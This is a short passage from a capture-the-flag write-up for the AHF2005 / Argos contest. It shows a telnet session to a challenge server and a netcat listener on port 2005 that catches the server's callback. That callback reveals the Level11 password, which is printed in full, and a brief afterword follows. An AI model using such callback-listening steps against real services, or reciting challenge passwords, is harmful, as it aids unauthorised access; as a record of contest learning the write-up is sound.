[hkpco@ns ahf]$ telnet 168.188.130.232 7979
Trying 168.188.130.232...
Connected to 168.188.130.232.
Escape character is '^]'.
HOM977<
# Password was sent to you! :-)
Connection closed by foreign host.

It says the password was sent to me.
That means it sends it to a particular port on my host.
Rather than finding that port with a sniffer, let's use the Sense the problem asks for.
From AHF2005 we can guess that the port is 2005.
So, listening with nc on port 2005 and sending the input again gives the password.

* Those without sense can use a sniffer instead.

(terminal1)
[hkpco@localhost ~]$ telnet 168.188.130.232 7979
Trying 168.188.130.232...
Connected to 168.188.130.232 (168.188.130.232).
Escape character is '^]'.
HOM977<
# Password was sent to you! :-)
Connection closed by foreign host.

(terminal2)
[hkpco@localhost ~]$ nc -l -v -p 2005
listening on [any] 2005 ...
168.188.130.232: inverse host lookup failed: Unknown host
connect to [222.122.45.36] from (UNKNOWN) [168.188.130.232] 39052
# Level11 Password is 'DoYouHaveAGirlFriend?'





-+-+-+-+-+-+-+-+-+-+ PostScript (afterword) -+-+-+-+-+-+-+-+-+-+

48 hours is long if you call it long and short if you call it short, but it was a good contest.
Argos in particular was not just plain problem solving like other contests, which I liked.
There were things I clearly knew but still could not solve,
and that in itself was a good chance to see what I am missing.
It was an opportunity to learn a lot while solving the problems.

And thanks to the people who spent their time running the contest.
Thank you for reading, and this concludes the afterword.
Thank you!
Argos !!
